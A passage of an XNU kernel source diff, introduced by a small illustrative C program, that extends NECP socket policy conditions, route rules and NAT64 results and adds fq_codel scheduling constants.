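The new delegate-is-platform-binary condition follows the same condition-mask / negated-mask idiom as the other socket conditions (ignoring the is_delegated gate). A toy version of that idiom, with hypothetical inputs:

#include <stdbool.h>
#include <stdio.h>

/* A set negated bit inverts the sense of the test; an unset condition
 * always lets the policy keep matching. */
static bool
toy_condition_allows(bool condition_set, bool condition_negated, bool value)
{
	if (!condition_set) {
		return true;
	}
	return condition_negated ? !value : value;
}

int
main(void)
{
	printf("%d\n", toy_condition_allows(true, false, true));   /* 1: required and present */
	printf("%d\n", toy_condition_allows(true, true, true));    /* 0: forbidden but present */
	printf("%d\n", toy_condition_allows(false, false, false)); /* 1: condition not used */
	return 0;
}
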
 
@@ -7570,7 +7726,7 @@ necp_socket_calc_flowhash_locked(struct necp_socket_info *info)
 }
 
 static void
-necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback)
+necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, bool override_is_inbound, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback)
 {
        struct socket *so = NULL;
        proc_t sock_proc = NULL;
@@ -7582,10 +7738,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
 
        info->drop_order = drop_order;
        info->is_loopback = is_loopback;
-
-       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) {
-               info->pid = ((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid);
-       }
+       info->is_delegated = ((so->so_flags & SOF_DELEGATED) ? true : false);
 
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_UID) {
                info->uid = kauth_cred_getuid(so->so_cred);
@@ -7610,7 +7763,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
                if (inp->inp_socket->so_flags1 & SOF1_CELLFALLBACK) {
                        info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_FALLBACK_TRAFFIC;
                }
-               if (inp->inp_socket->so_flags1 & SOF1_INBOUND) {
+               if (inp->inp_socket->so_flags1 & SOF1_INBOUND || override_is_inbound) {
                        info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_INBOUND;
                }
                if (inp->inp_socket->so_options & SO_ACCEPTCONN ||
@@ -7678,10 +7831,37 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
                }
        }
 
+       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) {
+               info->pid = socket_pid;
+               info->pid_version = proc_pidversion(sock_proc != NULL ? sock_proc : curr_proc);
+       }
+
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PLATFORM_BINARY) {
                info->is_platform_binary = necp_is_platform_binary(sock_proc ? sock_proc : curr_proc) ? true : false;
        }
 
+       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+               proc_t real_proc = curr_proc;
+               bool release_real_proc = false;
+               if (so->last_pid != proc_pid(real_proc)) {
+                       if (so->last_pid == socket_pid && sock_proc != NULL) {
+                               real_proc = sock_proc;
+                       } else {
+                               proc_t last_proc = proc_find(so->last_pid);
+                               if (last_proc != NULL) {
+                                       real_proc = last_proc;
+                                       release_real_proc = true;
+                               }
+                       }
+               }
+               if (real_proc != NULL) {
+                       info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false);
+                       if (release_real_proc) {
+                               proc_rele(real_proc);
+                       }
+               }
+       }
+
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && inp->inp_necp_attributes.inp_account != NULL) {
                struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, inp->inp_necp_attributes.inp_account);
                if (existing_mapping) {
@@ -7850,7 +8030,7 @@ necp_socket_find_policy_match_with_info_locked(struct necp_kernel_socket_policy
                                continue;
                        }
 
-                       if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback)) {
+                       if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->pid_version, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback, info->real_is_platform_binary, info->is_delegated)) {
                                if (policy_search_array[i]->result == NECP_KERNEL_POLICY_RESULT_SOCKET_FILTER) {
                                        if (return_filter && *return_filter != NECP_FILTER_UNIT_NO_FILTER) {
                                                necp_kernel_policy_filter control_unit = policy_search_array[i]->result_parameter.filter_control_unit;
@@ -8114,7 +8294,7 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local
 
        // Lock
        lck_rw_lock_shared(&necp_kernel_policy_lock);
-       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
 
        // Check info
        u_int32_t flowhash = necp_socket_calc_flowhash_locked(&info);
@@ -8363,7 +8543,8 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local
                necp_socket_ip_tunnel_tso(inp);
        }
 
-       if (send_local_network_denied_event) {
+       if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) {
+               inp->inp_policyresult.network_denied_notifies++;
                necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid),
                    ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid),
                    NETPOLICY_NETWORKTYPE_LOCAL);
@@ -9550,6 +9731,70 @@ necp_route_is_allowed(struct rtentry *route, struct ifnet *interface, u_int32_t
        return TRUE;
 }
 
+static uint32_t
+necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id)
+{
+       if (route == NULL) {
+               return 0;
+       }
+
+       struct ifnet *ifp = route->rt_ifp;
+       if (ifp == NULL) {
+               return 0;
+       }
+
+       struct necp_route_rule *route_rule = necp_lookup_route_rule_locked(&necp_route_rules, route_rule_id);
+       if (route_rule == NULL) {
+               return 0;
+       }
+
+       // No netagent, skip
+       if (route_rule->netagent_id == 0) {
+               return 0;
+       }
+
+       if (route_rule->default_action == NECP_ROUTE_RULE_USE_NETAGENT) {
+               return route_rule->netagent_id;
+       }
+
+       for (int exception_index = 0; exception_index < MAX_ROUTE_RULE_INTERFACES; exception_index++) {
+               if (route_rule->exception_if_indices[exception_index] == 0) {
+                       break;
+               }
+               if (route_rule->exception_if_indices[exception_index] == ifp->if_index &&
+                   route_rule->exception_if_actions[exception_index] == NECP_ROUTE_RULE_USE_NETAGENT) {
+                       return route_rule->netagent_id;
+               }
+       }
+
+       if (route_rule->cellular_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_type == IFT_CELLULAR) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->wifi_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_family == IFNET_FAMILY_ETHERNET && ifp->if_subfamily == IFNET_SUBFAMILY_WIFI) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->wired_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           (ifp->if_family == IFNET_FAMILY_ETHERNET || ifp->if_family == IFNET_FAMILY_FIREWIRE)) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->expensive_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_eflags & IFEF_EXPENSIVE) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->constrained_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_xflags & IFXF_CONSTRAINED) {
+               return route_rule->netagent_id;
+       }
+
+       return 0;
+}
+
 bool
 necp_packet_is_allowed_over_interface(struct mbuf *packet, struct ifnet *interface)
 {
@@ -9604,9 +9849,9 @@ necp_packet_filter_tags_receive(u_int16_t pf_tag, u_int32_t pass_flags)
 }
 
 static bool
-necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
-       u_int32_t verifyifindex = interface ? interface->if_index : 0;
+       u_int32_t verifyifindex = input_interface ? input_interface->if_index : 0;
        bool allowed_to_receive = TRUE;
        struct necp_socket_info info;
        u_int32_t flowhash = 0;
@@ -9672,7 +9917,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
                } else {
                        if (inp->inp_policyresult.results.route_rule_id != 0) {
                                lck_rw_lock_shared(&necp_kernel_policy_lock);
-                               if (!necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) {
+                               if (!necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) {
                                        route_allowed = FALSE;
                                }
                                lck_rw_done(&necp_kernel_policy_lock);
@@ -9683,7 +9928,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
                        if (!route_allowed ||
                            inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP ||
                            inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                           (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                           (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                            inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex)) {
                                allowed_to_receive = FALSE;
                        } else {
@@ -9713,7 +9958,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
        // Actually calculate policy result
        lck_rw_lock_shared(&necp_kernel_policy_lock);
-       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, input_interface != NULL ? true : false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
 
        flowhash = necp_socket_calc_flowhash_locked(&info);
        if (inp->inp_policyresult.policy_id != NECP_KERNEL_POLICY_ID_NONE &&
@@ -9721,10 +9966,10 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
            inp->inp_policyresult.flowhash == flowhash) {
                if (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP ||
                    inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                   (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                   (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                    inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex) ||
                    (inp->inp_policyresult.results.route_rule_id != 0 &&
-                   !necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) {
+                   !necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) {
                        allowed_to_receive = FALSE;
                } else {
                        if (return_policy_id) {
@@ -9780,13 +10025,13 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
                if (matched_policy->result == NECP_KERNEL_POLICY_RESULT_DROP ||
                    matched_policy->result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                   (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                   (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                    matched_policy->result_parameter.tunnel_interface_index != verifyifindex) ||
                    ((service_action == NECP_KERNEL_POLICY_RESULT_TRIGGER_SCOPED ||
                    service_action == NECP_KERNEL_POLICY_RESULT_NO_TRIGGER_SCOPED) &&
                    service.identifier != 0 && service.identifier != NECP_NULL_SERVICE_ID) ||
                    (route_rule_id != 0 &&
-                   !necp_route_is_allowed(route, interface, route_rule_id, &interface_type_denied)) ||
+                   !necp_route_is_allowed(route, input_interface, route_rule_id, &interface_type_denied)) ||
                    !necp_netagents_allow_traffic(netagent_ids, NECP_MAX_NETAGENTS)) {
                        allowed_to_receive = FALSE;
                } else {
@@ -9845,7 +10090,8 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
        lck_rw_done(&necp_kernel_policy_lock);
 
-       if (send_local_network_denied_event) {
+       if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) {
+               inp->inp_policyresult.network_denied_notifies++;
                necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid),
                    ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid),
                    NETPOLICY_NETWORKTYPE_LOCAL);
@@ -9872,7 +10118,7 @@ done:
 }
 
 bool
-necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
        struct sockaddr_in local = {};
        struct sockaddr_in remote = {};
@@ -9883,12 +10129,12 @@ necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port,
        memcpy(&local.sin_addr, local_addr, sizeof(local.sin_addr));
        memcpy(&remote.sin_addr, remote_addr, sizeof(remote.sin_addr));
 
-       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface,
                   pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags);
 }
 
 bool
-necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
        struct sockaddr_in6 local = {};
        struct sockaddr_in6 remote = {};
@@ -9899,15 +10145,15 @@ necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port,
        memcpy(&local.sin6_addr, local_addr, sizeof(local.sin6_addr));
        memcpy(&remote.sin6_addr, remote_addr, sizeof(remote.sin6_addr));
 
-       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface,
                   pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags);
 }
 
 bool
-necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id,
+necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id,
     u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
-       return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, interface, pf_tag,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, input_interface, pf_tag,
                   return_policy_id, return_route_rule_id,
                   return_skip_policy_id, return_pass_flags);
 }
index c2f39c6af5346d063985e6b2bf709bee8919ae3a..28c553dea626832dd9103b803da57f0c6b6be601 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2013-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2013-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -153,6 +153,7 @@ struct necp_packet_header {
 #define NECP_POLICY_CONDITION_SDK_VERSION               28      // struct necp_policy_condition_sdk_version
 #define NECP_POLICY_CONDITION_SIGNING_IDENTIFIER        29      // String
 #define NECP_POLICY_CONDITION_PACKET_FILTER_TAGS        30      // u_int16_t
+#define NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY      32      // N/A
 
 /*
  * Policy Packet tags
@@ -203,6 +204,7 @@ struct necp_packet_header {
 #define NECP_ROUTE_RULE_ALLOW_INTERFACE                 2       // String, or empty to match all
 #define NECP_ROUTE_RULE_QOS_MARKING                             3       // String, or empty to match all
 #define NECP_ROUTE_RULE_DENY_LQM_ABORT                  4       // String, or empty to match all
+#define NECP_ROUTE_RULE_USE_NETAGENT                    5       // UUID, followed by string or empty
 
 #define NECP_ROUTE_RULE_FLAG_CELLULAR                   0x01
 #define NECP_ROUTE_RULE_FLAG_WIFI                       0x02
@@ -311,6 +313,7 @@ struct necp_aggregate_result {
        u_int32_t                                                       policy_id;
        uuid_t                                                          netagents[NECP_MAX_NETAGENTS];
        u_int32_t                                                       netagent_use_flags[NECP_MAX_NETAGENTS];
+       struct ipv6_prefix                                              nat64_prefixes[NAT64_MAX_NUM_PREFIXES];
        u_int8_t                                                        mss_recommended;
 };
 
@@ -645,6 +648,7 @@ typedef struct necp_cache_buffer {
 #define NECP_CLIENT_RESULT_EFFECTIVE_TRAFFIC_CLASS              210             // u_int32_t
 #define NECP_CLIENT_RESULT_TRAFFIC_MGMT_BG                              211             // u_int32_t, 1: background, 0: not background
 #define NECP_CLIENT_RESULT_GATEWAY                                      212             // struct necp_client_endpoint
+#define NECP_CLIENT_RESULT_NAT64                                        213             // struct ipv6_prefix[NAT64_MAX_NUM_PREFIXES]
 
 #define NECP_CLIENT_RESULT_FLAG_IS_LOCAL                                0x0001  // Routes to this device
 #define NECP_CLIENT_RESULT_FLAG_IS_DIRECT                               0x0002  // Routes to directly accessible peer
@@ -948,6 +952,8 @@ extern int necp_buffer_find_tlv(u_int8_t *buffer, u_int32_t buffer_length, int o
 #define NECPCTL_RESTRICT_MULTICAST                      20      /* Restrict multicast access */
 #define NECPCTL_DEDUP_POLICIES                          21      /* Dedup overlapping policies */
 
+#define NECP_LOOPBACK_PASS_ALL         1  // Pass all loopback traffic
+#define NECP_LOOPBACK_PASS_WITH_FILTER 2  // Pass all loopback traffic, but activate content filter and/or flow divert if applicable
 
 #define NECPCTL_NAMES {                                 \
        { 0, 0 },                                                       \
@@ -1047,6 +1053,7 @@ struct necp_kernel_socket_policy {
        struct necp_policy_condition_sdk_version cond_sdk_version;
        char                                            *cond_signing_identifier;   // String
        u_int16_t                                       cond_packet_filter_tags;
+       int32_t                                         cond_pid_version;
 
        necp_kernel_policy_result       result;
        necp_kernel_policy_result_parameter     result_parameter;
@@ -1116,12 +1123,13 @@ struct necp_aggregate_socket_result {
 };
 
 struct necp_inpcb_result {
-       u_int32_t                                                       app_id;
+       u_int32_t                                       app_id;
        necp_kernel_policy_id                           policy_id;
        necp_kernel_policy_id                           skip_policy_id;
-       int32_t                                                         policy_gencount;
-       u_int32_t                                                       flowhash;
-       struct necp_aggregate_socket_result     results;
+       int32_t                                         policy_gencount;
+       u_int32_t                                       flowhash;
+       u_int32_t                                       network_denied_notifies;// Notification count
+       struct necp_aggregate_socket_result             results;
 };
 
 extern errno_t necp_init(void);
@@ -1142,18 +1150,18 @@ extern u_int32_t necp_socket_get_effective_mtu(struct inpcb *inp, u_int32_t curr
 
 extern bool necp_socket_is_allowed_to_recv_on_interface(struct inpcb *inp, ifnet_t interface);
 
-extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag,
+extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id,
     u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern bool necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port,
     u_int16_t remote_port, struct in_addr *local_addr,
-    struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag,
+    struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern bool necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port,
     u_int16_t remote_port, struct in6_addr *local_addr,
-    struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag,
+    struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern void necp_socket_update_qos_marking(struct inpcb *inp, struct rtentry *route, u_int32_t route_rule_id);
index 0ef2776e30392d40882db8dee152a9c14316c306..bcd49fb78809759b24ed7c30838663f67f063ea6 100644 (file)
@@ -1484,11 +1484,12 @@ static void
 necp_client_add_interface_option_if_needed(struct necp_client *client,
     uint32_t interface_index,
     uint32_t interface_generation,
-    uuid_t *nexus_agent)
+    uuid_t *nexus_agent,
+    bool network_provider)
 {
-       if (interface_index == IFSCOPE_NONE ||
+       if ((interface_index == IFSCOPE_NONE && !network_provider) ||
            (client->interface_option_count != 0 && !client->allow_multiple_flows)) {
-               // Interface not set, or client not allowed to use this mode
+               // Interface or agent not set, or client not allowed to use this mode
                return;
        }
 
@@ -1913,7 +1914,8 @@ necp_client_add_browse_interface_options(struct necp_client *client,
                            (flags & NETAGENT_FLAG_SUPPORTS_BROWSE) &&
                            (!(flags & NETAGENT_FLAG_SPECIFIC_USE_ONLY) ||
                            necp_netagent_is_required(parsed_parameters, &ifp->if_agentids[i]))) {
-                               necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), &ifp->if_agentids[i]);
+                               necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp),
+                                   &ifp->if_agentids[i], (flags & NETAGENT_FLAG_NETWORK_PROVIDER));
 
                                // Finding one is enough
                                break;
@@ -3531,6 +3533,15 @@ necp_update_client_result(proc_t proc,
                    client->result, sizeof(client->result));
        }
 
+       for (int i = 0; i < NAT64_MAX_NUM_PREFIXES; i++) {
+               if (result.nat64_prefixes[i].prefix_len != 0) {
+                       cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_NAT64,
+                           sizeof(result.nat64_prefixes), result.nat64_prefixes, &updated,
+                           client->result, sizeof(client->result));
+                       break;
+               }
+       }
+
        if (result.mss_recommended != 0) {
                cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_RECOMMENDED_MSS,
                    sizeof(result.mss_recommended), &result.mss_recommended, &updated,
@@ -3616,7 +3627,7 @@ necp_update_client_result(proc_t proc,
                        if (necp_ifnet_matches_parameters(multi_interface, parsed_parameters, 0, NULL, true, false)) {
                                // Add multipath interface flows for kernel MPTCP
                                necp_client_add_interface_option_if_needed(client, multi_interface->if_index,
-                                   ifnet_get_generation(multi_interface), NULL);
+                                   ifnet_get_generation(multi_interface), NULL, false);
 
                                // Add nexus agents for multipath
                                necp_client_add_agent_interface_options(client, parsed_parameters, multi_interface);
@@ -3631,7 +3642,7 @@ necp_update_client_result(proc_t proc,
 
                                // Add interface option in case it is not a nexus
                                necp_client_add_interface_option_if_needed(client, direct_interface->if_index,
-                                   ifnet_get_generation(direct_interface), NULL);
+                                   ifnet_get_generation(direct_interface), NULL, false);
                        }
                } else {
                        // Get listener interface options from global list
@@ -5635,7 +5646,8 @@ necp_client_add_flow(struct necp_fd_data *fd_data, struct necp_client_action_arg
                goto done;
        }
 
-       if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow)) {
+       if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow) ||
+           buffer_size > sizeof(struct necp_client_add_flow_default) * 4) {
                error = EINVAL;
                NECPLOG(LOG_ERR, "necp_client_add_flow invalid buffer (length %zu)", buffer_size);
                goto done;
index b34473e8b01dea1c49486dbff643466fc0d1d251..c7d058ec2f3042ef94a01243051fbef20a726555 100644 (file)
 #include <sys/types.h>
 #include <sys/param.h>
 #include <kern/zalloc.h>
+#include <net/ethernet.h>
 #include <net/if_var.h>
 #include <net/if.h>
 #include <net/classq/classq.h>
 #include <net/classq/classq_fq_codel.h>
 #include <net/pktsched/pktsched_fq_codel.h>
+#include <os/log.h>
+
+#define FQ_CODEL_DEFAULT_QUANTUM 1500
+
+#define FQ_CODEL_QUANTUM_BK_SYS(_q)    (_q)
+#define FQ_CODEL_QUANTUM_BK(_q)        (_q)
+#define FQ_CODEL_QUANTUM_BE(_q)        (_q)
+#define FQ_CODEL_QUANTUM_RD(_q)        (_q)
+#define FQ_CODEL_QUANTUM_OAM(_q)       (_q)
+#define FQ_CODEL_QUANTUM_AV(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_RV(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_VI(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_VO(_q)        ((_q * 2) / 5)
+#define FQ_CODEL_QUANTUM_CTL(_q)       ((_q * 2) / 5)
+
+#define FQ_CODEL_DRR_MAX_BK_SYS    2
+#define FQ_CODEL_DRR_MAX_BK        2
+#define FQ_CODEL_DRR_MAX_BE        4
+#define FQ_CODEL_DRR_MAX_RD        4
+#define FQ_CODEL_DRR_MAX_OAM       4
+#define FQ_CODEL_DRR_MAX_AV        6
+#define FQ_CODEL_DRR_MAX_RV        6
+#define FQ_CODEL_DRR_MAX_VI        6
+#define FQ_CODEL_DRR_MAX_VO        8
+#define FQ_CODEL_DRR_MAX_CTL       8
 
 static ZONE_DECLARE(fq_if_zone, "pktsched_fq_if", sizeof(fq_if_t), ZC_ZFREE_CLEARMEM);
 
+typedef STAILQ_HEAD(, flowq) flowq_dqlist_t;
+
 static fq_if_t *fq_if_alloc(struct ifnet *, classq_pkt_type_t);
 static void fq_if_destroy(fq_if_t *fqs);
 static void fq_if_classq_init(fq_if_t *fqs, uint32_t priority,
     uint16_t quantum, uint32_t drr_max, uint32_t svc_class);
 static void fq_if_dequeue(fq_if_t *, fq_if_classq_t *, uint32_t,
     int64_t, classq_pkt_t *, classq_pkt_t *, uint32_t *,
-    uint32_t *, boolean_t drvmgmt);
+    uint32_t *, flowq_dqlist_t *, boolean_t drvmgmt);
 void fq_if_stat_sc(fq_if_t *fqs, cqrq_stat_sc_t *stat);
 static void fq_if_purge(fq_if_t *);
 static void fq_if_purge_classq(fq_if_t *, fq_if_classq_t *);
@@ -51,7 +79,7 @@ static void fq_if_purge_flow(fq_if_t *, fq_t *, u_int32_t *, u_int32_t *);
 static void fq_if_empty_new_flow(fq_t *fq, fq_if_classq_t *fq_cl,
     bool add_to_old);
 static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl,
-    fq_t *fq, bool remove_hash);
+    fq_t *fq, bool remove_hash, bool destroy);
 
 #define FQ_IF_FLOW_HASH_ID(_flowid_) \
        (((_flowid_) >> FQ_IF_HASH_TAG_SHIFT) & FQ_IF_HASH_TAG_MASK)
@@ -75,8 +103,8 @@ fq_if_append_mbuf(classq_pkt_t *pkt, classq_pkt_t *next_pkt)
 
 static boolean_t
 fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
-    int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *top,
-    classq_pkt_t *last, u_int32_t *byte_cnt, u_int32_t *pkt_cnt,
